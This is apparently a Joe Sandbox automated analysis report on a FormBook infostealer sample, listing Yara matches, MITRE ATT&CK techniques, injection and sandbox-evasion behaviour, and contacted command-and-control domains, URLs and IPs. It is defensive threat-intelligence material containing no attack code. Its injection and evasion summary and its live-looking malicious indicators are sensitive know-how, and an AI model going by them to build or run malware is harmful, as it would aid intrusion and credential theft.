          Source: Yara matchFile source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 433214 Sample: SX365783909782021.bat Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 5 other signatures 2->42 10 SX365783909782021.exe 20 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\System.dll, PE32 10->28 dropped 52 Detected unpacking (changes PE section rights) 10->52 54 Maps a DLL or memory area into another process 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 14 SX365783909782021.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.djspencer.com 159.89.244.183, 49741, 80 DIGITALOCEAN-ASNUS United States 17->30 32 www.vacalinda.com 17->32 34 5 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 help.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SX365783909782021.exe32%VirustotalBrowse
          SX365783909782021.exe39%ReversingLabsWin32.Spyware.Noon
          SX365783909782021.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.SX365783909782021.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.SX365783909782021.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.2.SX365783909782021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.help.exe.3b2f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.SX365783909782021.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.1.SX365783909782021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.help.exe.d3d870.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.SX365783909782021.exe.22b0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          ghs.googlehosted.com0%VirustotalBrowse
          caravansforsalenorthwales.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.djspencer.com/ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ40%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.caravansforsalenorthwales.com/ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ40%Avira URL Cloudsafe
          www.moneyhuntercom.info/ngvm/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.vacalinda.com/ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ40%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.servicesbackyard.com/ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ40%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          parking.namesilo.com
          		168.235.88.209
          		truefalse
            		high
            www.djspencer.com
            		159.89.244.183
            		truetrue
              		unknown
              ghs.googlehosted.com
              		142.250.180.243
              		truefalseunknown
              caravansforsalenorthwales.com
              		34.102.136.180
              		truefalseunknown
              www.vacalinda.com
              		unknown
              		unknowntrue
                		unknown
                www.servicesbackyard.com
                		unknown
                		unknowntrue
                  		unknown
                  www.caravansforsalenorthwales.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.djspencer.com/ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.caravansforsalenorthwales.com/ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4false
                    • Avira URL Cloud: safe
                    		unknown
                    www.moneyhuntercom.info/ngvm/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.vacalinda.com/ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.servicesbackyard.com/ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.tiro.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://nsis.sf.net/NSIS_ErrorErrorSX365783909782021.exefalse
                                  		high
                                  http://www.goodfont.co.krexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorSX365783909782021.exefalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fonts.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            142.250.180.243
                                            		ghs.googlehosted.comUnited States
                                            		15169GOOGLEUSfalse
                                            34.102.136.180
                                            		caravansforsalenorthwales.comUnited States
                                            		15169GOOGLEUSfalse
                                            168.235.88.209
                                            		parking.namesilo.comUnited States
                                            		3842RAMNODEUSfalse
                                            159.89.244.183
                                            		www.djspencer.comUnited States
                                            		14061DIGITALOCEAN-ASNUStrue

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:433214
                                            Start date:11.06.2021
                                            Start time:13:15:17
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 9s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:SX365783909782021.bat (renamed file extension from bat to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:24
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/4@4/4
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 24.5% (good quality ratio 22.4%)
                                            • Quality average: 75.5%
                                            • Quality standard deviation: 30.4%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 102
                                            • Number of non-executed functions: 200
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 40.88.32.150, 52.147.198.201, 184.30.20.56, 20.82.210.154, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.209.104
                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            168.235.88.209EDS03932,pdf.exeGet hashmaliciousBrowse
                                            • www.rechnung.pro/hw6d/?mL0XlT=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzWkIOMmg3Jwa27nFeQ==&cBZL=U8td9LP09nG8cn
                                            don.exeGet hashmaliciousBrowse
                                            • www.lanren.plus/uoe8/?BR=cjlpd&Y4plXns=tMPs/lCAJOvogVxKb5b8gcWtLLVD4pee8Rndx52EvkMBNrCA1tN1bmbJt/VCVDdzd/qq
                                            ZsA5S2nQAa.exeGet hashmaliciousBrowse
                                            • www.alpinevalleytimeshares.com/nsag/?Rx=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVSL8q5zf2v8a&MJBD=FdFtDb28tZBh4rJP
                                            SHED.EXEGet hashmaliciousBrowse
                                            • www.servicesguidedata.com/r8pp/?T8Vh=VgA+V9dlqvhFAd2g5YDRlqwEUwSOXLZpnUVCzqpi7uV4yZFrT/qWWoxWPxTalBnvoZjj&-ZPl=1bdpal
                                            nova narud#U017eba.exeGet hashmaliciousBrowse
                                            • www.computercodecamp.com/fs8/?1b9Tzt1=U/dVVm2xwTFLDerdjbCDYRAG3ilhc39Y3/HlBm6zr75t2PsdnytLljzoCFBWJoJHXz0sh8CU1Q==&KtkPT=Ab8l7rXHZnC0w2DP
                                            New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                            • www.4winner.xyz/eao/?1bB0mR=2eKuYykfKT6E0YrQApY5J4vDJiqOigtFaVbxWGoO7nVxUHKG519x/DeD7eAHpFfAydzY&UPC=yvCdVR2
                                            159.89.244.183z2xQEFs54b.exeGet hashmaliciousBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              parking.namesilo.comtgb4.exeGet hashmaliciousBrowse
                                              • 45.58.190.82
                                              5.25.21.exeGet hashmaliciousBrowse
                                              • 70.39.125.244
                                              purchase order.docGet hashmaliciousBrowse
                                              • 188.164.131.200
                                              Glgcjrikwubeurawzvfntcaqnlnuvkpnql_Signed_.exeGet hashmaliciousBrowse
                                              • 70.39.125.244
                                              000192.xlsGet hashmaliciousBrowse
                                              • 198.251.81.30
                                              0ccd2703_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 198.251.84.92
                                              doc545567799890.exeGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              EDS03932,pdf.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              don.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              PO_29_00412.exeGet hashmaliciousBrowse
                                              • 198.251.84.92
                                              2sj75tLtYO.exeGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              Swift Copy Ref.xlsxGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              wOPGM5LfSdNOEOp.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              Proforma Invoice.xlsxGet hashmaliciousBrowse
                                              • 204.188.203.155
                                              Complete Certificate.exeGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              eQLPRPErea.exeGet hashmaliciousBrowse
                                              • 64.32.22.102
                                              vbc.exeGet hashmaliciousBrowse
                                              • 209.141.38.71
                                              Payment Slip.exeGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              UTcQK0heAfGWTLw.exeGet hashmaliciousBrowse
                                              • 64.32.22.102
                                              RFQ # 1014397402856.pdf.exeGet hashmaliciousBrowse
                                              • 204.188.203.155

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              DIGITALOCEAN-ASNUSprocesshacker-2.39-setup.exeGet hashmaliciousBrowse
                                              • 162.243.25.33
                                              8BDBD0yy0q.apkGet hashmaliciousBrowse
                                              • 167.99.135.134
                                              8BDBD0yy0q.apkGet hashmaliciousBrowse
                                              • 167.99.135.134
                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              crt9O3URua.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              WcCEh3daIE.xlsGet hashmaliciousBrowse
                                              • 157.245.231.228
                                              UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                              • 157.245.232.77
                                              Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                              • 138.197.103.178
                                              46113.dllGet hashmaliciousBrowse
                                              • 157.245.231.228
                                              46113.dllGet hashmaliciousBrowse
                                              • 157.245.231.228
                                              Payment Copy.exeGet hashmaliciousBrowse
                                              • 68.183.229.215
                                              teX5sUCWAg.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              16X4iz8fTb.exeGet hashmaliciousBrowse
                                              • 139.59.176.201
                                              teX5sUCWAg.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              P M.exeGet hashmaliciousBrowse
                                              • 138.68.75.3
                                              Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                              • 68.183.21.244
                                              03062021.exeGet hashmaliciousBrowse
                                              • 159.89.241.246
                                              85OpNw6eXm.exeGet hashmaliciousBrowse
                                              • 46.101.214.246
                                              JJ1PbTh0SP.dllGet hashmaliciousBrowse
                                              • 174.138.22.216
                                              RAMNODEUSEDS03932,pdf.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              seven#U5305#U88dd#U7167#U548c#U7455#U75b5#U7167-#U89e3#U58d3#U7e2e#U5bc6#U78bcm210511.exeGet hashmaliciousBrowse
                                              • 168.235.72.162
                                              wmac.exeGet hashmaliciousBrowse
                                              • 192.184.83.206
                                              don.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              .x86_64Get hashmaliciousBrowse
                                              • 168.235.95.104
                                              .x86_64Get hashmaliciousBrowse
                                              • 168.235.95.104
                                              v8iFmF7XPp.dllGet hashmaliciousBrowse
                                              • 168.235.67.138
                                              ZsA5S2nQAa.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              YpyXT7Tnik.exeGet hashmaliciousBrowse
                                              • 23.226.236.13
                                              2ojdmC51As.exeGet hashmaliciousBrowse
                                              • 168.235.67.138
                                              0HCan2RjnP.exeGet hashmaliciousBrowse
                                              • 107.161.23.204
                                              OZD Payment Information TT784677U.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              OZD Payment Information TT784677U.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Invoice.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Order-10236587458.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Purchase Order22420.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Concentracion de pedidos_PO.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              P_Order Flex Saneh.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Purchase Order list.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              rfq02212021.exeGet hashmaliciousBrowse
                                              • 168.235.93.122

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dllmoq fob order.exeGet hashmaliciousBrowse
                                                0900000000000090000.exeGet hashmaliciousBrowse
                                                  444890321.exeGet hashmaliciousBrowse
                                                    Packing-List_00930039.exeGet hashmaliciousBrowse
                                                      2435.exeGet hashmaliciousBrowse
                                                        INVOICE.exeGet hashmaliciousBrowse
                                                          Shipment Invoice & Consignment Notification.exeGet hashmaliciousBrowse
                                                            KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                              5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                                8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                                  New Order PO2193570O1.docGet hashmaliciousBrowse
                                                                    L2.xlsxGet hashmaliciousBrowse
                                                                      Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                        New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
